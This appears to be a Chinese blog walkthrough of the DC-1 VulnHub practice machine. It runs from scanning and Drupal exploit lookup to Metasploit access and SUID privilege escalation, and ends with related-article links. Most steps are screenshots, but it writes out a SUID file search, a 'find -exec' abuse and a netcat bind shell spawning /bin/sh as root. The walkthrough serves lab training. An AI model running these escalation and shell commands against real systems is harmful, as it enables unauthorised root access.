靶机实战(DC-1)

最新推荐文章于 2024-06-04 16:20:34 发布
最新推荐文章于 2024-06-04 16:20:34 发布
阅读量272 收藏
点赞数
分类专栏: 靶机实战 文章标签: 安全 安全漏洞 linux 扫描测试工具 黑盒测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605313/article/details/106475690
版权

DC-1

实验环境

靶机:DC-1
测试机:kali(IP:192.168.238.143),win10

实验过程

信息收集

主机发现

靶机ip:192.168.238.158
在这里插入图片描述

端口扫描

在这里插入图片描述在这里插入图片描述

目录扫描

主页面
在这里插入图片描述
在这里插入图片描述

网站指纹

在这里插入图片描述
searchsploit 搜索网站框架漏洞
在这里插入图片描述

漏洞发现

使用add admin user
在这里插入图片描述
添加一个用户:abcd :abcd
在这里插入图片描述
在这里插入图片描述
成功登录
在这里插入图片描述
也可利用msf框架执行命令
在这里插入图片描述

漏洞利用

在这里插入图片描述
设置参数
在这里插入图片描述
拿到一个session
在这里插入图片描述

shell
python -c 'import pty;pty.spawn("/bin/bash")'
拿到一个终端

在这里插入图片描述

提权

suid提权:以文件拥有者身份执行命令

查找具有root权限的suid文件
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
执行命令

touch filename
find filename -exec whoami \;

在这里插入图片描述
反弹root终端

find filename -exec nc -lvp 1234 -e /bin/sh \;

在这里插入图片描述

nc -nv 192.168.238.158 1234

在这里插入图片描述

总结

1.发现网站框架,可以利用searchsploit查找相关漏洞
2.msf’的使用
3.suid提权:利用文件拥有者的身份执行命令。

~~...
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机DC-1 WP
m0_66638011的博客
05-11 1644
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 8031
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
【渗透测试】DC-1靶机实战(上)漏洞扫描获取反弹shell
最新发布
m0_74313947的博客
06-04 1203
靶机下载地址靶机界面渗透测试流程:1.范围界定2. 信息搜集3. 目标识别4. 服务枚举5. 漏洞映射6. 社会工程学7. 漏洞利用8. 权限提升9. 访问维护0. 文档报告。
【Vulnhub靶机DC-1(suid find提权)
过期的秋刀鱼
08-03 422
Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。22、根据 flag4.txt 中的内容,推测下一步需要进行提权,从而获得 root 权限,并访问 /root 目录,获得 flag5。找到了与 http 相关的模块,根据 Rank(等级)优先选择带颜色的模块,使用。
DC-1靶场详解
苏生要努力
03-12 2841
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
DC1-靶机详解
TonyChaoWei的博客
02-06 1773
DC系列靶机渗透实战 提权
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-1靶机渗透
weixin_45349299的博客
01-03 320
title: DC-1靶机渗透详解tags: DC系列靶机categories: 学习笔记。
dc-1靶机
qq_63267612的博客
09-28 1270
显示修改成功,尝试去登陆发现登陆失败,这里显示的密码是加密过的,尝试去找到drupaldb的加密方式,然后把密码更改为一个加密过的但是是已知的密码。可以看到开放了ssh端口和http和111端口,尝试查看一下网站,有一个登陆框,尝试sql注入,发现没有用,不过可以从界面发现cms是drupal。使用说明:下载后解压后得到一个ova的文件,在vm虚拟机中直接打开设置好相关的设置,配置好之后,注意靶机和kali的网络设置调换成NAT模式。知道了cms是drupal,drupal有一些可以利用的漏洞进入msf
dc-1靶机实战详情(新手)
kyp_1994的博客
08-28 1086
dc-1靶机详细获取flag过程新手勿喷
DC-1靶机学习
qq_43711254的博客
11-09 885
DC靶机的练习过程,如有错误请各位大佬及时指出
靶机DC-1攻略
weixin_43179779的博客
10-07 1127
dc-1靶机靶机攻略
DC-1靶机渗透复现(详细教程)
hqhhhh的博客
10-09 306
DC-1靶机渗透实战教学,非常详细!包学包会
DC系列靶机1通关教程_dc1 靶机,2024年最新我了解到的面试的一些小内幕
2401_83947105的博客
04-15 679
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解
qq_58091216的博客
09-25 990
13. 我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。15. 此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破。2) 查看数据库,切换到drupaldb数据库,查看查找默认的Drupal user 表,发现admin信息。5. 虚拟机开启之后需要登录,我们不知道密码,需要探活ip地址,网段知道:192.168.52.0/24。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值